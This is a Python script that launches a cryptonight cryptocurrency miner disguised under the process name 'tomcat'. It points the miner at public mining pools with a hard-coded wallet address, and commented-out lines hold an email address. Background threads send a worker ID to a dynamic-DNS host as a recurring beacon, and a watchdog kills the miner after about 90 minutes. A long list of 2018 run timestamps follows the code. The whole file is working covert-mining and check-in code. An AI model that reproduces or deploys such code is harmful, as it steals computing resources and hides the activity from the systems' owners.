import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:10:06.940740
#2018-02-17 15:57:01.919114
#2018-02-17 17:44:01.356585
#2018-02-17 19:32:01.408165
#2018-02-17 21:20:07.364426
#2018-02-17 23:04:05.301574
#2018-02-18 00:52:04.019265
#2018-02-18 02:40:05.487590
#2018-02-18 04:28:06.614106
#2018-02-18 06:19:05.803658
#2018-02-18 08:09:06.173592
#2018-02-18 09:56:05.049191
#2018-02-18 11:43:04.844787
#2018-02-18 13:28:06.119310
#2018-02-18 15:18:03.744052
#2018-02-18 17:07:06.081849
#2018-02-18 18:54:06.758858
#2018-02-18 20:42:05.984767
#2018-02-18 22:28:05.041587
#2018-02-19 00:17:01.302599
#2018-02-19 02:03:04.584727
#2018-02-19 03:50:07.098804
#2018-02-19 05:35:06.050571
#2018-02-19 07:23:05.603151
#2018-02-19 09:14:04.636120
#2018-02-19 11:03:08.420096
#2018-02-19 12:50:05.249247
#2018-02-19 14:38:03.123813
#2018-02-19 16:25:08.538330
#2018-02-19 18:13:05.207070
#2018-02-19 20:01:04.496127
#2018-02-19 21:51:04.624885
#2018-02-19 23:37:04.140745
#2018-02-20 01:24:05.171664
#2018-02-20 03:14:04.398034
#2018-02-20 05:00:11.014054
#2018-02-20 06:44:06.396974
#2018-02-20 08:29:07.179396
#2018-02-20 10:14:01.882599
#2018-02-20 11:58:09.949524
#2018-02-20 13:46:07.343995
#2018-02-20 15:27:05.841224
#2018-02-20 17:14:02.018019
#2018-02-20 19:05:07.462974
#2018-02-20 20:54:01.921043
#2018-02-20 22:40:09.313433
#2018-02-21 00:22:04.032493
#2018-02-21 02:07:03.227091
#2018-02-21 03:55:07.658816
#2018-02-21 05:43:06.091397
#2018-02-21 07:31:06.611393
#2018-02-21 09:17:04.202427
#2018-02-21 11:06:02.225236
#2018-02-21 12:55:01.834721
#2018-02-21 14:43:08.405761
#2018-02-21 16:32:04.629787
#2018-02-21 18:22:01.697504
#2018-02-21 20:07:07.367727
#2018-02-21 21:55:04.598817
#2018-02-21 23:40:10.143615
#2018-02-22 01:30:09.937915
#2018-02-22 03:18:07.758149
#2018-02-22 05:05:09.066981
#2018-02-22 06:48:03.953820
#2018-02-22 08:36:04.101345
#2018-02-22 10:23:01.859877
#2018-02-22 12:10:05.807397
#2018-02-22 13:56:01.344208
#2018-02-22 15:43:10.483920
#2018-02-22 17:29:05.764041
#2018-02-22 19:16:09.169977
#2018-02-22 21:09:01.260119
#2018-02-22 22:54:05.867716
#2018-02-23 00:42:07.756939
#2018-02-23 02:28:01.626318
#2018-02-23 04:17:03.469450
#2018-02-23 06:05:05.765771
#2018-02-23 07:50:01.385858
#2018-02-23 10:08:07.973368
#2018-02-23 11:59:08.168420
#2018-02-23 13:48:08.541576
#2018-02-23 15:39:01.504587
#2018-02-23 17:26:08.808666
#2018-02-23 19:13:06.376817
#2018-02-23 20:57:05.338577
#2018-02-23 22:55:05.269280
#2018-02-24 00:43:06.906414
#2018-02-24 02:35:01.679077
#2018-02-24 04:28:06.970291
#2018-02-24 06:14:05.359406
#2018-02-24 08:02:04.293044
#2018-02-24 09:44:01.842208
#2018-02-24 11:41:06.216059
#2018-02-24 13:32:05.377548
#2018-02-24 15:20:01.354711
#2018-02-24 17:09:07.378390
#2018-02-24 19:01:05.204516
#2018-02-24 20:48:01.410297
#2018-02-24 23:04:07.094374
#2018-02-25 02:21:01.678509
#2018-02-25 05:33:06.857782
#2018-02-25 11:34:05.153731